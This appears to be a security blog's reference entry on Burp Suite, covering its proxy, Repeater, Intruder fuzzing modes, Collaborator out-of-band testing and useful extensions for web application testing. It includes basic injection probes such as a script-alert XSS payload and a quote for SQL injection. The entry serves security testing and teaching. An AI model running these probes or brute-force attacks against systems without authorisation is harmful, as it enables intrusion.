gengstah

gengstah

Exploring the spaces between specs — where weird machines live and exploits are born

Burp Suite

Type: Tool Also known as: Burp, Burp Suite Professional, Burp Suite Community Related: Web Application Testing, Sql Injection, Xss

Description

Burp Suite is the leading platform for web application security testing. It acts as an intercepting HTTP/HTTPS proxy, with tools for manual testing (Repeater, Intruder), automated scanning (Scanner — Pro only), and extensibility via the BApp store. Developed by PortSwigger.

Usage / Details

Core Tools

ToolPurpose
ProxyIntercept and modify browser traffic
RepeaterManually replay and tweak requests
IntruderFuzzing and brute-force attacks
ScannerAutomated vulnerability scanning (Pro)
DecoderEncode/decode (Base64, URL, hex, etc.)
ComparerDiff two requests/responses
LoggerFull traffic log
DOM InvaderDOM XSS testing via browser extension
CollaboratorOut-of-band interaction server (SSRF, blind SQLi, blind XSS)

Setup

  1. Set browser proxy to 127.0.0.1:8080.
  2. Install Burp CA certificate in browser (navigate to http://burp).
  3. Or use Burp’s embedded Chromium browser (built-in, no cert install needed).

Common Workflows

Manual Testing with Repeater

  • Intercept request → Send to Repeater (Ctrl+R) → Modify and resend.
  • Test for SQLi: add ', observe error. Test for XSS: inject <script>alert(1)</script>.

Fuzzing with Intruder

1. Send request to Intruder (Ctrl+I)
2. Mark injection point: §value§
3. Attack type:
   - Sniper: one payload set, one position
   - Battering Ram: same payload in all positions
   - Pitchfork: parallel payload sets
   - Cluster Bomb: cartesian product (brute-force)
4. Load payload list (SecLists, custom)
5. Configure match/filter rules to spot successes

Note: Community edition rate-limits Intruder. Use ffuf or feroxbuster for speed.

Burp Collaborator (OAST)

  • Provides unique *.oastify.com domain.
  • Use in payloads for SSRF, XXE, blind SQLi, blind XSS → confirm OOB interaction.
  • Check “Collaborator” tab for incoming DNS/HTTP callbacks.

Scanning (Pro)

  • Right-click request → “Scan” → Active or Passive scan.
  • Crawl + Audit on a scope for broad coverage.
  • Review Issue Activity for findings.

Useful Extensions (BApp Store)

  • Autorize — automated authorization testing (IDOR)
  • Turbo Intruder — high-speed fuzzer (Python scripts)
  • HTTP Request Smuggler — request smuggling testing
  • JWT Editor — JWT manipulation
  • Active Scan++ — extend scanner capabilities
  • Param Miner — discover hidden parameters
  • Hackvertor — complex payload encoding
  • Logger++ — enhanced logging with filtering

Keyboard Shortcuts

ActionShortcut
Send to RepeaterCtrl+R
Send to IntruderCtrl+I
Forward interceptedCtrl+F
Toggle interceptCtrl+T

References

  • PortSwigger Web Security Academy — portswigger.net/web-security
  • Burp Suite documentation — portswigger.net/burp/documentation